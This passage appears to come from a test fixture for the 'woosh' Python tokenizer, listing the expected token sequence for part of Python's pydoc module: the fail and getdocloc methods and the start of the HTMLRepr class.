woosh.Token(woosh.NAME, 'self', 477, 52, 477, 56),
woosh.Token(woosh.OP, '.', 477, 56, 477, 57),
woosh.Token(woosh.NAME, 'docdata', 477, 57, 477, 64),
woosh.Token(woosh.OP, '(', 477, 64, 477, 65),
woosh.Token(woosh.OP, '*', 477, 65, 477, 66),
woosh.Token(woosh.NAME, 'args', 477, 66, 477, 70),
woosh.Token(woosh.OP, ')', 477, 70, 477, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 477, 71, 478, 0),
woosh.Token(woosh.NAME, 'return', 478, 8, 478, 14),
woosh.Token(woosh.NAME, 'self', 478, 15, 478, 19),
woosh.Token(woosh.OP, '.', 478, 19, 478, 20),
woosh.Token(woosh.NAME, 'docother', 478, 20, 478, 28),
woosh.Token(woosh.OP, '(', 478, 28, 478, 29),
woosh.Token(woosh.OP, '*', 478, 29, 478, 30),
woosh.Token(woosh.NAME, 'args', 478, 30, 478, 34),
woosh.Token(woosh.OP, ')', 478, 34, 478, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 478, 35, 479, 0),
woosh.Token(woosh.DEDENT, ' ', 480, 0, 480, 4),
woosh.Token(woosh.NAME, 'def', 480, 4, 480, 7),
woosh.Token(woosh.NAME, 'fail', 480, 8, 480, 12),
woosh.Token(woosh.OP, '(', 480, 12, 480, 13),
woosh.Token(woosh.NAME, 'self', 480, 13, 480, 17),
woosh.Token(woosh.OP, ',', 480, 17, 480, 18),
woosh.Token(woosh.NAME, 'object', 480, 19, 480, 25),
woosh.Token(woosh.OP, ',', 480, 25, 480, 26),
woosh.Token(woosh.NAME, 'name', 480, 27, 480, 31),
woosh.Token(woosh.OP, '=', 480, 31, 480, 32),
woosh.Token(woosh.NAME, 'None', 480, 32, 480, 36),
woosh.Token(woosh.OP, ',', 480, 36, 480, 37),
woosh.Token(woosh.OP, '*', 480, 38, 480, 39),
woosh.Token(woosh.NAME, 'args', 480, 39, 480, 43),
woosh.Token(woosh.OP, ')', 480, 43, 480, 44),
woosh.Token(woosh.OP, ':', 480, 44, 480, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 480, 45, 481, 0),
woosh.Token(woosh.INDENT, ' ', 481, 0, 481, 8),
woosh.Token(woosh.STRING, '"""Raise an exception for unimplemented types."""', 481, 8, 481, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 481, 57, 482, 0),
woosh.Token(woosh.NAME, 'message', 482, 8, 482, 15),
woosh.Token(woosh.OP, '=', 482, 16, 482, 17),
woosh.Token(woosh.STRING, '"don\'t know how to document object%s of type %s"', 482, 18, 482, 66),
woosh.Token(woosh.OP, '%', 482, 67, 482, 68),
woosh.Token(woosh.OP, '(', 482, 69, 482, 70),
woosh.Token(woosh.NAME, 'name', 483, 12, 483, 16),
woosh.Token(woosh.NAME, 'and', 483, 17, 483, 20),
woosh.Token(woosh.STRING, "' '", 483, 21, 483, 24),
woosh.Token(woosh.OP, '+', 483, 25, 483, 26),
woosh.Token(woosh.NAME, 'repr', 483, 27, 483, 31),
woosh.Token(woosh.OP, '(', 483, 31, 483, 32),
woosh.Token(woosh.NAME, 'name', 483, 32, 483, 36),
woosh.Token(woosh.OP, ')', 483, 36, 483, 37),
woosh.Token(woosh.OP, ',', 483, 37, 483, 38),
woosh.Token(woosh.NAME, 'type', 483, 39, 483, 43),
woosh.Token(woosh.OP, '(', 483, 43, 483, 44),
woosh.Token(woosh.NAME, 'object', 483, 44, 483, 50),
woosh.Token(woosh.OP, ')', 483, 50, 483, 51),
woosh.Token(woosh.OP, '.', 483, 51, 483, 52),
woosh.Token(woosh.NAME, '__name__', 483, 52, 483, 60),
woosh.Token(woosh.OP, ')', 483, 60, 483, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 483, 61, 484, 0),
woosh.Token(woosh.NAME, 'raise', 484, 8, 484, 13),
woosh.Token(woosh.NAME, 'TypeError', 484, 14, 484, 23),
woosh.Token(woosh.OP, '(', 484, 23, 484, 24),
woosh.Token(woosh.NAME, 'message', 484, 24, 484, 31),
woosh.Token(woosh.OP, ')', 484, 31, 484, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 484, 32, 485, 0),
woosh.Token(woosh.DEDENT, ' ', 486, 0, 486, 4),
woosh.Token(woosh.NAME, 'docmodule', 486, 4, 486, 13),
woosh.Token(woosh.OP, '=', 486, 14, 486, 15),
woosh.Token(woosh.NAME, 'docclass', 486, 16, 486, 24),
woosh.Token(woosh.OP, '=', 486, 25, 486, 26),
woosh.Token(woosh.NAME, 'docroutine', 486, 27, 486, 37),
woosh.Token(woosh.OP, '=', 486, 38, 486, 39),
woosh.Token(woosh.NAME, 'docother', 486, 40, 486, 48),
woosh.Token(woosh.OP, '=', 486, 49, 486, 50),
woosh.Token(woosh.NAME, 'docproperty', 486, 51, 486, 62),
woosh.Token(woosh.OP, '=', 486, 63, 486, 64),
woosh.Token(woosh.NAME, 'docdata', 486, 65, 486, 72),
woosh.Token(woosh.OP, '=', 486, 73, 486, 74),
woosh.Token(woosh.NAME, 'fail', 486, 75, 486, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 486, 79, 487, 0),
woosh.Token(woosh.NAME, 'def', 488, 4, 488, 7),
woosh.Token(woosh.NAME, 'getdocloc', 488, 8, 488, 17),
woosh.Token(woosh.OP, '(', 488, 17, 488, 18),
woosh.Token(woosh.NAME, 'self', 488, 18, 488, 22),
woosh.Token(woosh.OP, ',', 488, 22, 488, 23),
woosh.Token(woosh.NAME, 'object', 488, 24, 488, 30),
woosh.Token(woosh.OP, ',', 488, 30, 488, 31),
woosh.Token(woosh.NAME, 'basedir', 488, 32, 488, 39),
woosh.Token(woosh.OP, '=', 488, 39, 488, 40),
woosh.Token(woosh.NAME, 'sysconfig', 488, 40, 488, 49),
woosh.Token(woosh.OP, '.', 488, 49, 488, 50),
woosh.Token(woosh.NAME, 'get_path', 488, 50, 488, 58),
woosh.Token(woosh.OP, '(', 488, 58, 488, 59),
woosh.Token(woosh.STRING, "'stdlib'", 488, 59, 488, 67),
woosh.Token(woosh.OP, ')', 488, 67, 488, 68),
woosh.Token(woosh.OP, ')', 488, 68, 488, 69),
woosh.Token(woosh.OP, ':', 488, 69, 488, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 488, 70, 489, 0),
woosh.Token(woosh.INDENT, ' ', 489, 0, 489, 8),
woosh.Token(woosh.STRING, '"""Return the location of module docs or None"""', 489, 8, 489, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 489, 56, 490, 0),
woosh.Token(woosh.NAME, 'try', 491, 8, 491, 11),
woosh.Token(woosh.OP, ':', 491, 11, 491, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 491, 12, 492, 0),
woosh.Token(woosh.INDENT, ' ', 492, 0, 492, 12),
woosh.Token(woosh.NAME, 'file', 492, 12, 492, 16),
woosh.Token(woosh.OP, '=', 492, 17, 492, 18),
woosh.Token(woosh.NAME, 'inspect', 492, 19, 492, 26),
woosh.Token(woosh.OP, '.', 492, 26, 492, 27),
woosh.Token(woosh.NAME, 'getabsfile', 492, 27, 492, 37),
woosh.Token(woosh.OP, '(', 492, 37, 492, 38),
woosh.Token(woosh.NAME, 'object', 492, 38, 492, 44),
woosh.Token(woosh.OP, ')', 492, 44, 492, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 492, 45, 493, 0),
woosh.Token(woosh.DEDENT, ' ', 493, 0, 493, 8),
woosh.Token(woosh.NAME, 'except', 493, 8, 493, 14),
woosh.Token(woosh.NAME, 'TypeError', 493, 15, 493, 24),
woosh.Token(woosh.OP, ':', 493, 24, 493, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 493, 25, 494, 0),
woosh.Token(woosh.INDENT, ' ', 494, 0, 494, 12),
woosh.Token(woosh.NAME, 'file', 494, 12, 494, 16),
woosh.Token(woosh.OP, '=', 494, 17, 494, 18),
woosh.Token(woosh.STRING, "'(built-in)'", 494, 19, 494, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 494, 31, 495, 0),
woosh.Token(woosh.DEDENT, ' ', 496, 0, 496, 8),
woosh.Token(woosh.NAME, 'docloc', 496, 8, 496, 14),
woosh.Token(woosh.OP, '=', 496, 15, 496, 16),
woosh.Token(woosh.NAME, 'os', 496, 17, 496, 19),
woosh.Token(woosh.OP, '.', 496, 19, 496, 20),
woosh.Token(woosh.NAME, 'environ', 496, 20, 496, 27),
woosh.Token(woosh.OP, '.', 496, 27, 496, 28),
woosh.Token(woosh.NAME, 'get', 496, 28, 496, 31),
woosh.Token(woosh.OP, '(', 496, 31, 496, 32),
woosh.Token(woosh.STRING, '"PYTHONDOCS"', 496, 32, 496, 44),
woosh.Token(woosh.OP, ',', 496, 44, 496, 45),
woosh.Token(woosh.NAME, 'self', 496, 46, 496, 50),
woosh.Token(woosh.OP, '.', 496, 50, 496, 51),
woosh.Token(woosh.NAME, 'PYTHONDOCS', 496, 51, 496, 61),
woosh.Token(woosh.OP, ')', 496, 61, 496, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 496, 62, 497, 0),
woosh.Token(woosh.NAME, 'basedir', 498, 8, 498, 15),
woosh.Token(woosh.OP, '=', 498, 16, 498, 17),
woosh.Token(woosh.NAME, 'os', 498, 18, 498, 20),
woosh.Token(woosh.OP, '.', 498, 20, 498, 21),
woosh.Token(woosh.NAME, 'path', 498, 21, 498, 25),
woosh.Token(woosh.OP, '.', 498, 25, 498, 26),
woosh.Token(woosh.NAME, 'normcase', 498, 26, 498, 34),
woosh.Token(woosh.OP, '(', 498, 34, 498, 35),
woosh.Token(woosh.NAME, 'basedir', 498, 35, 498, 42),
woosh.Token(woosh.OP, ')', 498, 42, 498, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 498, 43, 499, 0),
woosh.Token(woosh.NAME, 'if', 499, 8, 499, 10),
woosh.Token(woosh.OP, '(', 499, 11, 499, 12),
woosh.Token(woosh.NAME, 'isinstance', 499, 12, 499, 22),
woosh.Token(woosh.OP, '(', 499, 22, 499, 23),
woosh.Token(woosh.NAME, 'object', 499, 23, 499, 29),
woosh.Token(woosh.OP, ',', 499, 29, 499, 30),
woosh.Token(woosh.NAME, 'type', 499, 31, 499, 35),
woosh.Token(woosh.OP, '(', 499, 35, 499, 36),
woosh.Token(woosh.NAME, 'os', 499, 36, 499, 38),
woosh.Token(woosh.OP, ')', 499, 38, 499, 39),
woosh.Token(woosh.OP, ')', 499, 39, 499, 40),
woosh.Token(woosh.NAME, 'and', 499, 41, 499, 44),
woosh.Token(woosh.OP, '(', 500, 12, 500, 13),
woosh.Token(woosh.NAME, 'object', 500, 13, 500, 19),
woosh.Token(woosh.OP, '.', 500, 19, 500, 20),
woosh.Token(woosh.NAME, '__name__', 500, 20, 500, 28),
woosh.Token(woosh.NAME, 'in', 500, 29, 500, 31),
woosh.Token(woosh.OP, '(', 500, 32, 500, 33),
woosh.Token(woosh.STRING, "'errno'", 500, 33, 500, 40),
woosh.Token(woosh.OP, ',', 500, 40, 500, 41),
woosh.Token(woosh.STRING, "'exceptions'", 500, 42, 500, 54),
woosh.Token(woosh.OP, ',', 500, 54, 500, 55),
woosh.Token(woosh.STRING, "'gc'", 500, 56, 500, 60),
woosh.Token(woosh.OP, ',', 500, 60, 500, 61),
woosh.Token(woosh.STRING, "'imp'", 500, 62, 500, 67),
woosh.Token(woosh.OP, ',', 500, 67, 500, 68),
woosh.Token(woosh.STRING, "'marshal'", 501, 33, 501, 42),
woosh.Token(woosh.OP, ',', 501, 42, 501, 43),
woosh.Token(woosh.STRING, "'posix'", 501, 44, 501, 51),
woosh.Token(woosh.OP, ',', 501, 51, 501, 52),
woosh.Token(woosh.STRING, "'signal'", 501, 53, 501, 61),
woosh.Token(woosh.OP, ',', 501, 61, 501, 62),
woosh.Token(woosh.STRING, "'sys'", 501, 63, 501, 68),
woosh.Token(woosh.OP, ',', 501, 68, 501, 69),
woosh.Token(woosh.STRING, "'_thread'", 502, 33, 502, 42),
woosh.Token(woosh.OP, ',', 502, 42, 502, 43),
woosh.Token(woosh.STRING, "'zipimport'", 502, 44, 502, 55),
woosh.Token(woosh.OP, ')', 502, 55, 502, 56),
woosh.Token(woosh.NAME, 'or', 502, 57, 502, 59),
woosh.Token(woosh.OP, '(', 503, 13, 503, 14),
woosh.Token(woosh.NAME, 'file', 503, 14, 503, 18),
woosh.Token(woosh.OP, '.', 503, 18, 503, 19),
woosh.Token(woosh.NAME, 'startswith', 503, 19, 503, 29),
woosh.Token(woosh.OP, '(', 503, 29, 503, 30),
woosh.Token(woosh.NAME, 'basedir', 503, 30, 503, 37),
woosh.Token(woosh.OP, ')', 503, 37, 503, 38),
woosh.Token(woosh.NAME, 'and', 503, 39, 503, 42),
woosh.Token(woosh.NAME, 'not', 504, 14, 504, 17),
woosh.Token(woosh.NAME, 'file', 504, 18, 504, 22),
woosh.Token(woosh.OP, '.', 504, 22, 504, 23),
woosh.Token(woosh.NAME, 'startswith', 504, 23, 504, 33),
woosh.Token(woosh.OP, '(', 504, 33, 504, 34),
woosh.Token(woosh.NAME, 'os', 504, 34, 504, 36),
woosh.Token(woosh.OP, '.', 504, 36, 504, 37),
woosh.Token(woosh.NAME, 'path', 504, 37, 504, 41),
woosh.Token(woosh.OP, '.', 504, 41, 504, 42),
woosh.Token(woosh.NAME, 'join', 504, 42, 504, 46),
woosh.Token(woosh.OP, '(', 504, 46, 504, 47),
woosh.Token(woosh.NAME, 'basedir', 504, 47, 504, 54),
woosh.Token(woosh.OP, ',', 504, 54, 504, 55),
woosh.Token(woosh.STRING, "'site-packages'", 504, 56, 504, 71),
woosh.Token(woosh.OP, ')', 504, 71, 504, 72),
woosh.Token(woosh.OP, ')', 504, 72, 504, 73),
woosh.Token(woosh.OP, ')', 504, 73, 504, 74),
woosh.Token(woosh.OP, ')', 504, 74, 504, 75),
woosh.Token(woosh.NAME, 'and', 504, 76, 504, 79),
woosh.Token(woosh.NAME, 'object', 505, 12, 505, 18),
woosh.Token(woosh.OP, '.', 505, 18, 505, 19),
woosh.Token(woosh.NAME, '__name__', 505, 19, 505, 27),
woosh.Token(woosh.NAME, 'not', 505, 28, 505, 31),
woosh.Token(woosh.NAME, 'in', 505, 32, 505, 34),
woosh.Token(woosh.OP, '(', 505, 35, 505, 36),
woosh.Token(woosh.STRING, "'xml.etree'", 505, 36, 505, 47),
woosh.Token(woosh.OP, ',', 505, 47, 505, 48),
woosh.Token(woosh.STRING, "'test.pydoc_mod'", 505, 49, 505, 65),
woosh.Token(woosh.OP, ')', 505, 65, 505, 66),
woosh.Token(woosh.OP, ')', 505, 66, 505, 67),
woosh.Token(woosh.OP, ':', 505, 67, 505, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 505, 68, 506, 0),
woosh.Token(woosh.INDENT, ' ', 506, 0, 506, 12),
woosh.Token(woosh.NAME, 'if', 506, 12, 506, 14),
woosh.Token(woosh.NAME, 'docloc', 506, 15, 506, 21),
woosh.Token(woosh.OP, '.', 506, 21, 506, 22),
woosh.Token(woosh.NAME, 'startswith', 506, 22, 506, 32),
woosh.Token(woosh.OP, '(', 506, 32, 506, 33),
woosh.Token(woosh.OP, '(', 506, 33, 506, 34),
woosh.Token(woosh.STRING, '"http://"', 506, 34, 506, 43),
woosh.Token(woosh.OP, ',', 506, 43, 506, 44),
woosh.Token(woosh.STRING, '"https://"', 506, 45, 506, 55),
woosh.Token(woosh.OP, ')', 506, 55, 506, 56),
woosh.Token(woosh.OP, ')', 506, 56, 506, 57),
woosh.Token(woosh.OP, ':', 506, 57, 506, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 506, 58, 507, 0),
woosh.Token(woosh.INDENT, ' ', 507, 0, 507, 16),
woosh.Token(woosh.NAME, 'docloc', 507, 16, 507, 22),
woosh.Token(woosh.OP, '=', 507, 23, 507, 24),
woosh.Token(woosh.STRING, '"%s/%s"', 507, 25, 507, 32),
woosh.Token(woosh.OP, '%', 507, 33, 507, 34),
woosh.Token(woosh.OP, '(', 507, 35, 507, 36),
woosh.Token(woosh.NAME, 'docloc', 507, 36, 507, 42),
woosh.Token(woosh.OP, '.', 507, 42, 507, 43),
woosh.Token(woosh.NAME, 'rstrip', 507, 43, 507, 49),
woosh.Token(woosh.OP, '(', 507, 49, 507, 50),
woosh.Token(woosh.STRING, '"/"', 507, 50, 507, 53),
woosh.Token(woosh.OP, ')', 507, 53, 507, 54),
woosh.Token(woosh.OP, ',', 507, 54, 507, 55),
woosh.Token(woosh.NAME, 'object', 507, 56, 507, 62),
woosh.Token(woosh.OP, '.', 507, 62, 507, 63),
woosh.Token(woosh.NAME, '__name__', 507, 63, 507, 71),
woosh.Token(woosh.OP, '.', 507, 71, 507, 72),
woosh.Token(woosh.NAME, 'lower', 507, 72, 507, 77),
woosh.Token(woosh.OP, '(', 507, 77, 507, 78),
woosh.Token(woosh.OP, ')', 507, 78, 507, 79),
woosh.Token(woosh.OP, ')', 507, 79, 507, 80),
woosh.Token(woosh.NEWLINE, '\r\n', 507, 80, 508, 0),
woosh.Token(woosh.DEDENT, ' ', 508, 0, 508, 12),
woosh.Token(woosh.NAME, 'else', 508, 12, 508, 16),
woosh.Token(woosh.OP, ':', 508, 16, 508, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 508, 17, 509, 0),
woosh.Token(woosh.INDENT, ' ', 509, 0, 509, 16),
woosh.Token(woosh.NAME, 'docloc', 509, 16, 509, 22),
woosh.Token(woosh.OP, '=', 509, 23, 509, 24),
woosh.Token(woosh.NAME, 'os', 509, 25, 509, 27),
woosh.Token(woosh.OP, '.', 509, 27, 509, 28),
woosh.Token(woosh.NAME, 'path', 509, 28, 509, 32),
woosh.Token(woosh.OP, '.', 509, 32, 509, 33),
woosh.Token(woosh.NAME, 'join', 509, 33, 509, 37),
woosh.Token(woosh.OP, '(', 509, 37, 509, 38),
woosh.Token(woosh.NAME, 'docloc', 509, 38, 509, 44),
woosh.Token(woosh.OP, ',', 509, 44, 509, 45),
woosh.Token(woosh.NAME, 'object', 509, 46, 509, 52),
woosh.Token(woosh.OP, '.', 509, 52, 509, 53),
woosh.Token(woosh.NAME, '__name__', 509, 53, 509, 61),
woosh.Token(woosh.OP, '.', 509, 61, 509, 62),
woosh.Token(woosh.NAME, 'lower', 509, 62, 509, 67),
woosh.Token(woosh.OP, '(', 509, 67, 509, 68),
woosh.Token(woosh.OP, ')', 509, 68, 509, 69),
woosh.Token(woosh.OP, '+', 509, 70, 509, 71),
woosh.Token(woosh.STRING, '".html"', 509, 72, 509, 79),
woosh.Token(woosh.OP, ')', 509, 79, 509, 80),
woosh.Token(woosh.NEWLINE, '\r\n', 509, 80, 510, 0),
woosh.Token(woosh.DEDENT, ' ', 510, 0, 510, 8),
woosh.Token(woosh.DEDENT, '', 510, 8, 510, 8),
woosh.Token(woosh.NAME, 'else', 510, 8, 510, 12),
woosh.Token(woosh.OP, ':', 510, 12, 510, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 510, 13, 511, 0),
woosh.Token(woosh.INDENT, ' ', 511, 0, 511, 12),
woosh.Token(woosh.NAME, 'docloc', 511, 12, 511, 18),
woosh.Token(woosh.OP, '=', 511, 19, 511, 20),
woosh.Token(woosh.NAME, 'None', 511, 21, 511, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 511, 25, 512, 0),
woosh.Token(woosh.DEDENT, ' ', 512, 0, 512, 8),
woosh.Token(woosh.NAME, 'return', 512, 8, 512, 14),
woosh.Token(woosh.NAME, 'docloc', 512, 15, 512, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 512, 21, 513, 0),
woosh.Token(woosh.COMMENT, '# -------------------------------------------- HTML documentation generator', 514, 0, 514, 75),
woosh.Token(woosh.DEDENT, '', 516, 0, 516, 0),
woosh.Token(woosh.DEDENT, '', 516, 0, 516, 0),
woosh.Token(woosh.NAME, 'class', 516, 0, 516, 5),
woosh.Token(woosh.NAME, 'HTMLRepr', 516, 6, 516, 14),
woosh.Token(woosh.OP, '(', 516, 14, 516, 15),
woosh.Token(woosh.NAME, 'Repr', 516, 15, 516, 19),
woosh.Token(woosh.OP, ')', 516, 19, 516, 20),
woosh.Token(woosh.OP, ':', 516, 20, 516, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 516, 21, 517, 0),
woosh.Token(woosh.INDENT, ' ', 517, 0, 517, 4),
woosh.Token(woosh.STRING, '"""Class for safely making an HTML representation of a Python object."""', 517, 4, 517, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 517, 76, 518, 0),
woosh.Token(woosh.NAME, 'def', 518, 4, 518, 7),
woosh.Token(woosh.NAME, '__init__', 518, 8, 518, 16),
woosh.Token(woosh.OP, '(', 518, 16, 518, 17),
woosh.Token(woosh.NAME, 'self', 518, 17, 518, 21),
woosh.Token(woosh.OP, ')', 518, 21, 518, 22),
woosh.Token(woosh.OP, ':', 518, 22, 518, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 518, 23, 519, 0),
woosh.Token(woosh.INDENT, ' ', 519, 0, 519, 8),
woosh.Token(woosh.NAME, 'Repr', 519, 8, 519, 12),
woosh.Token(woosh.OP, '.', 519, 12, 519, 13),
woosh.Token(woosh.NAME, '__init__', 519, 13, 519, 21),
woosh.Token(woosh.OP, '(', 519, 21, 519, 22),
woosh.Token(woosh.NAME, 'self', 519, 22, 519, 26),
woosh.Token(woosh.OP, ')', 519, 26, 519, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 519, 27, 520, 0),
woosh.Token(woosh.NAME, 'self', 520, 8, 520, 12),
woosh.Token(woosh.OP, '.', 520, 12, 520, 13),
woosh.Token(woosh.NAME, 'maxlist', 520, 13, 520, 20),
woosh.Token(woosh.OP, '=', 520, 21, 520, 22),
woosh.Token(woosh.NAME, 'self', 520, 23, 520, 27),
woosh.Token(woosh.OP, '.', 520, 27, 520, 28),
woosh.Token(woosh.NAME, 'maxtuple', 520, 28, 520, 36),
woosh.Token(woosh.OP, '=', 520, 37, 520, 38),
woosh.Token(woosh.NUMBER, '20', 520, 39, 520, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 520, 41, 521, 0),
woosh.Token(woosh.NAME, 'self', 521, 8, 521, 12),
woosh.Token(woosh.OP, '.', 521, 12, 521, 13),
woosh.Token(woosh.NAME, 'maxdict', 521, 13, 521, 20),
woosh.Token(woosh.OP, '=', 521, 21, 521, 22),
woosh.Token(woosh.NUMBER, '10', 521, 23, 521, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 521, 25, 522, 0),
woosh.Token(woosh.NAME, 'self', 522, 8, 522, 12),
woosh.Token(woosh.OP, '.', 522, 12, 522, 13),
woosh.Token(woosh.NAME, 'maxstring', 522, 13, 522, 22),
woosh.Token(woosh.OP, '=', 522, 23, 522, 24),
woosh.Token(woosh.NAME, 'self', 522, 25, 522, 29),
woosh.Token(woosh.OP, '.', 522, 29, 522, 30),
woosh.Token(woosh.NAME, 'maxother', 522, 30, 522, 38),
woosh.Token(woosh.OP, '=', 522, 39, 522, 40),
woosh.Token(woosh.NUMBER, '100', 522, 41, 522, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 522, 44, 523, 0),
woosh.Token(woosh.DEDENT, ' ', 524, 0, 524, 4),
woosh.Token(woosh.NAME, 'def', 524, 4, 524, 7),
woosh.Token(woosh.NAME, 'escape', 524, 8, 524, 14),
woosh.Token(woosh.OP, '(', 524, 14, 524, 15),
woosh.Token(woosh.NAME, 'self', 524, 15, 524, 19),
woosh.Token(woosh.OP, ',', 524, 19, 524, 20),
woosh.Token(woosh.NAME, 'text', 524, 21, 524, 25),
woosh.Token(woosh.OP, ')', 524, 25, 524, 26),
woosh.Token(woosh.OP, ':', 524, 26, 524, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 524, 27, 525, 0),
woosh.Token(woosh.INDENT, ' ', 525, 0, 525, 8),
woosh.Token(woosh.NAME, 'return', 525, 8, 525, 14),
woosh.Token(woosh.NAME, 'replace', 525, 15, 525, 22),
woosh.Token(woosh.OP, '(', 525, 22, 525, 23),
woosh.Token(woosh.NAME, 'text', 525, 23, 525, 27),
woosh.Token(woosh.OP, ',', 525, 27, 525, 28),
woosh.Token(woosh.STRING, "'&'", 525, 29, 525, 32),
woosh.Token(woosh.OP, ',', 525, 32, 525, 33),
woosh.Token(woosh.STRING, "'&'", 525, 34, 525, 41),
woosh.Token(woosh.OP, ',', 525, 41, 525, 42),
woosh.Token(woosh.STRING, "'<'", 525, 43, 525, 46),
woosh.Token(woosh.OP, ',', 525, 46, 525, 47),
woosh.Token(woosh.STRING, "'<'", 525, 48, 525, 54),
woosh.Token(woosh.OP, ',', 525, 54, 525, 55),
woosh.Token(woosh.STRING, "'>'", 525, 56, 525, 59),
woosh.Token(woosh.OP, ',', 525, 59, 525, 60),
woosh.Token(woosh.STRING, "'>'", 525, 61, 525, 67),
woosh.Token(woosh.OP, ')', 525, 67, 525, 68),
woosh.Token(woosh.NEWLINE, '\r\n', 525, 68, 526, 0),
woosh.Token(woosh.DEDENT, ' ', 527, 0, 527, 4),
woosh.Token(woosh.NAME, 'def', 527, 4, 527, 7),
woosh.Token(woosh.NAME, 'repr', 527, 8, 527, 12),
woosh.Token(woosh.OP, '(', 527, 12, 527, 13),
woosh.Token(woosh.NAME, 'self', 527, 13, 527, 17),
woosh.Token(woosh.OP, ',', 527, 17, 527, 18),
woosh.Token(woosh.NAME, 'object', 527, 19, 527, 25),
woosh.Token(woosh.OP, ')', 527, 25, 527, 26),
woosh.Token(woosh.OP, ':', 527, 26, 527, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 527, 27, 528, 0),
woosh.Token(woosh.INDENT, ' ', 528, 0, 528, 8),
woosh.Token(woosh.NAME, 'return', 528, 8, 528, 14),
woosh.Token(woosh.NAME, 'Repr', 528, 15, 528, 19),
woosh.Token(woosh.OP, '.', 528, 19, 528, 20),
woosh.Token(woosh.NAME, 'repr', 528, 20, 528, 24),
woosh.Token(woosh.OP, '(', 528, 24, 528, 25),
woosh.Token(woosh.NAME, 'self', 528, 25, 528, 29),
woosh.Token(woosh.OP, ',', 528, 29, 528, 30),
woosh.Token(woosh.NAME, 'object', 528, 31, 528, 37),
woosh.Token(woosh.OP, ')', 528, 37, 528, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 528, 38, 529, 0),
woosh.Token(woosh.DEDENT, ' ', 530, 0, 530, 4),
woosh.Token(woosh.NAME, 'def', 530, 4, 530, 7),
woosh.Token(woosh.NAME, 'repr1', 530, 8, 530, 13),
woosh.Token(woosh.OP, '(', 530, 13, 530, 14),
woosh.Token(woosh.NAME, 'self', 530, 14, 530, 18),
woosh.Token(woosh.OP, ',', 530, 18, 530, 19),
woosh.Token(woosh.NAME, 'x', 530, 20, 530, 21),
woosh.Token(woosh.OP, ',', 530, 21, 530, 22),
woosh.Token(woosh.NAME, 'level', 530, 23, 530, 28),
woosh.Token(woosh.OP, ')', 530, 28, 530, 29),
woosh.Token(woosh.OP, ':', 530, 29, 530, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 530, 30, 531, 0),
woosh.Token(woosh.INDENT, ' ', 531, 0, 531, 8),
woosh.Token(woosh.NAME, 'if', 531, 8, 531, 10),
woosh.Token(woosh.NAME, 'hasattr', 531, 11, 531, 18),
woosh.Token(woosh.OP, '(', 531, 18, 531, 19),
woosh.Token(woosh.NAME, 'type', 531, 19, 531, 23),
woosh.Token(woosh.OP, '(', 531, 23, 531, 24),
woosh.Token(woosh.NAME, 'x', 531, 24, 531, 25),
woosh.Token(woosh.OP, ')', 531, 25, 531, 26),
woosh.Token(woosh.OP, ',', 531, 26, 531, 27),
woosh.Token(woosh.STRING, "'__name__'", 531, 28, 531, 38),
woosh.Token(woosh.OP, ')', 531, 38, 531, 39),
woosh.Token(woosh.OP, ':', 531, 39, 531, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 531, 40, 532, 0),
woosh.Token(woosh.INDENT, ' ', 532, 0, 532, 12),
woosh.Token(woosh.NAME, 'methodname', 532, 12, 532, 22),
woosh.Token(woosh.OP, '=', 532, 23, 532, 24),
woosh.Token(woosh.STRING, "'repr_'", 532, 25, 532, 32),
woosh.Token(woosh.OP, '+', 532, 33, 532, 34),
woosh.Token(woosh.STRING, "'_'", 532, 35, 532, 38),
woosh.Token(woosh.OP, '.', 532, 38, 532, 39),
woosh.Token(woosh.NAME, 'join', 532, 39, 532, 43),
woosh.Token(woosh.OP, '(', 532, 43, 532, 44),
woosh.Token(woosh.NAME, 'type', 532, 44, 532, 48),
woosh.Token(woosh.OP, '(', 532, 48, 532, 49),
woosh.Token(woosh.NAME, 'x', 532, 49, 532, 50),
woosh.Token(woosh.OP, ')', 532, 50, 532, 51),
woosh.Token(woosh.OP, '.', 532, 51, 532, 52),
woosh.Token(woosh.NAME, '__name__', 532, 52, 532, 60),
woosh.Token(woosh.OP, '.', 532, 60, 532, 61),
woosh.Token(woosh.NAME, 'split', 532, 61, 532, 66),
woosh.Token(woosh.OP, '(', 532, 66, 532, 67),
woosh.Token(woosh.OP, ')', 532, 67, 532, 68),
woosh.Token(woosh.OP, ')', 532, 68, 532, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 532, 69, 533, 0),
woosh.Token(woosh.NAME, 'if', 533, 12, 533, 14),
woosh.Token(woosh.NAME, 'hasattr', 533, 15, 533, 22),
woosh.Token(woosh.OP, '(', 533, 22, 533, 23),
woosh.Token(woosh.NAME, 'self', 533, 23, 533, 27),
woosh.Token(woosh.OP, ',', 533, 27, 533, 28),
woosh.Token(woosh.NAME, 'methodname', 533, 29, 533, 39),
woosh.Token(woosh.OP, ')', 533, 39, 533, 40),
woosh.Token(woosh.OP, ':', 533, 40, 533, 41),
